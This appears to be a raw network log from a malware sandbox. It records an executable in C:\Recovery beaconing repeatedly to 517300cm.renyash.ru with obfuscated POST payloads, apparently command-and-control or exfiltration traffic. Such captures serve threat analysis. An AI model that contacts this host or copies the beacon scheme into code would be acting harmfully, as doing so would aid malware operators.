Jan 9, 2025 18:13:11.365864992 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:11.721690893 CET	1012	OUT	Data Raw: 50 54 5e 58 58 40 50 54 59 58 51 54 5b 56 57 5d 5f 55 58 54 52 52 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PT^XX@PTYXQT[VW]_UXTRRZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z #4"X#8Z"&?>$U"% "&8?#,4(*'\"/Y.,
Jan 9, 2025 18:13:11.824645996 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:12.086364031 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kIaCQsdJXzBNuR7CBIsZCcOg1duz52LMSHAAsGyNz0bpTQ%2BzP2k3hqEU7HRGzx%2BcE%2BeuxdJV6sSKd09kwmdPJXszr%2FuAW4f3d%2BfEsxzFbu2j2gjs7uopC%2BafNNzGR3iWrl02qzTB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e78a8ef4382-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3684&min_rtt=1906&rtt_var=4272&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=90486&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49902	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:12.208199978 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:12.565568924 CET	1012	OUT	Data Raw: 50 51 5e 59 58 42 55 56 59 58 51 54 5b 51 57 56 5f 5c 58 5b 52 58 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PQ^YXBUVYXQT[QWV_\X[RXZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#Z0%_4>^?Y-;3X#5;Z=\;59$0-1+_ ?'\"/Y.0
Jan 9, 2025 18:13:12.766640902 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:12.937930107 CET	802	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RkHBzYu5TicSF0xMujegyHjk16j7krVkySN81kBhDLPXubOhXtApTWKoxmtbsKS2VMAoBTlI1piOr7jI5BwsUItbftlYOgFpinHFgGAtuPcA9608l%2Bk0MInDrEkb3taXcouw%2BWS0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e7e7e70de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4309&min_rtt=1451&rtt_var=6260&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=60042&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49908	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:13.084738970 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:13.440551996 CET	1012	OUT	Data Raw: 55 57 5b 5a 58 44 50 57 59 58 51 54 5b 52 57 53 5f 55 58 5c 52 53 5a 46 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW[ZXDPWYXQT[RWS_UX\RSZF^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z + =_ <!= #Z/;#["5>,V51V&'4/ +'\"/Y.
Jan 9, 2025 18:13:13.628159046 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:13.839637041 CET	803	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=puQy7bDJuMYjTOtHbHMD%2FN4%2F4E7rXiqX7xOCTcTyY1edsvxiANbxz7hGPNkCKMr4KvFGr8YUWEfARKBxvIm9Pa2lgKVPwcZsTEQzIGxKuDK9Ho7W5bPm0hKC7uIcWqWXLmGEqJwU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e83ed6df5fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3008&min_rtt=1521&rtt_var=3544&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=108817&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49915	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:13.993465900 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:14.346739054 CET	1012	OUT	Data Raw: 50 56 5e 59 5d 43 55 5f 59 58 51 54 5b 5c 57 56 5f 54 58 5f 52 5b 5a 43 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PV^Y]CU_YXQT[\WV_TX_R[ZC^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^>3 ,X)7\83Y47): -V$0)%($#<$):'\"/Y.
Jan 9, 2025 18:13:14.467346907 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:14.650572062 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDMMRCUF6qw7cM8iLEi3Vzr22NKZVRVw1m82J6wffgO2fPZyepRfCHeJixY0yEmU7Kex4f6DOLk5xXTiS0AQeeQQvBAj2fSCC7hwmaaY5xEpV%2BxkNw4Mc%2B3Q8%2B76LQIdKDXDyN%2Bj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e892a4a9e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4258&min_rtt=1984&rtt_var=5292&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=72352&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49920	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:14.771389008 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49922	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:15.025357008 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:15.378084898 CET	1292	OUT	Data Raw: 50 53 5b 5b 5d 40 55 5f 59 58 51 54 5b 5c 57 5d 5f 53 58 5d 52 5a 5a 49 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[[]@U_YXQT[\W]_SX]RZZI^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z )U9_7?>=3$/+Z75:R![52%(' $<:'\"/Y.
Jan 9, 2025 18:13:15.487297058 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:15.768615961 CET	954	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTu%2B6I5V%2FEXAFtMmSvCBYTap0wT2S9%2BfTWl4UuffwfAWiEBPwdLzA61tz5fEr5rNysTJ6KrHbQEQIGP7TU0UdyCNtstNWX29DypJ8CtVQNwoIpYlSYfRlrwGoYMli4fEQh01yIpp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e8f8df13320-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3451&min_rtt=2002&rtt_var=3650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=107352&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 14 25 36 2f 52 30 2f 2b 50 25 31 31 55 23 31 08 5d 2c 58 27 1d 22 3a 2b 16 2f 32 32 01 36 11 2f 16 30 0b 2e 09 31 5a 23 56 23 36 21 5d 01 12 27 07 33 07 22 10 27 3d 2c 5f 31 5e 23 44 23 2d 27 00 33 28 31 08 25 1d 38 54 22 3d 07 1c 2a 3e 22 01 2f 06 3c 14 2f 37 0e 5e 3c 13 2b 51 0e 10 21 0a 27 13 26 59 2b 3d 23 5c 26 0b 28 52 29 11 0e 03 32 02 23 0a 3e 5f 3b 0c 27 39 1a 59 37 11 23 01 3f 29 37 05 25 28 3a 08 3d 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!%6/R0/+P%11U#1],X'":+/226/0.1Z#V#6!]'3"'=,_1^#D#-'3(1%8T"=*>"/</7^<+Q!'&Y+=#\&(R)2#>_;'9Y7#?)7%(:=8 \.-R>TP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49924	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:15.145986080 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:15.502963066 CET	1012	OUT	Data Raw: 55 57 5b 5f 5d 43 50 57 59 58 51 54 5b 56 57 53 5f 50 58 5c 52 5e 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UW[_]CPWYXQT[VWS_PX\R^ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#^*09#>? ;Z;?Y75/])9?6"&0>$+0#/8):'\"/Y.,
Jan 9, 2025 18:13:15.767343044 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:15.890587091 CET	806	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CXHRDlc%2FNq77V79u5sgk1QTH8A9t7n9UfWBjgAcOelPlV1FHubbI8kTZrhUZyDRdofzq63nzhbZDRc3xG3%2FJ7z0i%2FaD82zucFGu5dJO%2FNmim3bqruezfkgyS9yLF96sOgobOGUj1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e904f468c2d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3852&min_rtt=2039&rtt_var=4391&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=88233&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49929	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:16.027673960 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:16.378078938 CET	1012	OUT	Data Raw: 55 55 5e 5f 5d 42 55 5e 59 58 51 54 5b 52 57 55 5f 55 58 59 52 5e 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU^_]BU^YXQT[RWU_UXYR^ZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#[)U57?9*#4,/\ %?)(":%#%%++Z7?$?'\"/Y.
Jan 9, 2025 18:13:16.476577044 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:16.733390093 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JeXHNu%2BpsUmqT6oss%2Fx6BfXDvwvuOdDgYayY3WBns0dTL3PEdx%2B%2FTYeWaw8dwbWJih0VcNdlj2dZpKlG%2FShuGfwP%2Bs7jxBTRXH4V0E4MqXoynU1%2Fg9noJlCW7N7J7AL7Z5VuHrJk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e95be14727d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4727&min_rtt=2318&rtt_var=5687&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=67620&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49937	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:16.867583990 CET	301	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 9, 2025 18:13:17.221734047 CET	1012	OUT	Data Raw: 55 50 5b 58 5d 44 50 54 59 58 51 54 5b 50 57 51 5f 51 58 5d 52 52 5a 42 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UP[X]DPTYXQT[PWQ_QX]RRZB^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#36 :_0$,4#5;\=$V6="%>$;3[ '<*'\"/Y.4
Jan 9, 2025 18:13:17.312583923 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:17.583509922 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEbB9Wb29u7Ky%2BCU5KvYW61CsqIXOa0%2F%2Fl40QiOJzIT0scCsOytibsC5Sb4ljERKeNF68ueGvgPRrRdTbd8mlNY7J428X%2BN0VSSIY3bgXUVkyjmtNBS4ALdJfyhE%2BFWokLEZ6z3N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60e9afd3e78d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2253&min_rtt=2026&rtt_var=1215&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1313&delivery_rate=379516&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49941	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:17.725153923 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:18.081130981 CET	1008	OUT	Data Raw: 55 55 5b 5d 5d 43 55 51 59 58 51 54 5b 55 57 52 5f 54 58 5f 52 5e 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU[]]CUQYXQT[UWR_TX_R^Z@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#X#_7Z%=0;^3[#5;Z8S .!&=R%++X 'Y(*'\"/Y.
Jan 9, 2025 18:13:18.317858934 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:18.524775028 CET	813	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QN0qNkheuw9JsgealijuEW8WuzcLaJFmB0%2F%2Bgll%2BjEnEKmx07i66WqDMJfHVHAzrSiM6FXAdAgQGefjpJ%2B%2FQocnSUhXQb2xRVjnk1MmKCFgFy1A4e9rCxdS%2BRSylgyJl2ENvdZb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ea138c37d11-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=57820&min_rtt=57581&rtt_var=22071&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=24539&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49950	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:13:18.649902105 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:13:19.003040075 CET	1012	OUT	Data Raw: 50 55 5b 58 58 41 55 53 59 58 51 54 5b 52 57 55 5f 5c 58 59 52 5f 5a 48 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PU[XXAUSYXQT[RWU_\XYR_ZH^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z *35Y41=3Y8( 7'[=\865W20&28$ Y;]+'\"/Y.
Jan 9, 2025 18:13:19.112867117 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:13:19.290927887 CET	807	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bs5x3U12R7li9k3uri%2BscRUXTglyUH59EENGxs%2FN42eq%2BOZDXm9jpA7SVHtG22qW0wtZR6EAlNIwbkEaD8c7x7i9NbYcTQJBkzV7aAEYvRPrbO%2FKVec2C6HXOur2rahpvERCDWgZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60ea62a050cc2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3146&min_rtt=1708&rtt_var=3517&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=110472&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
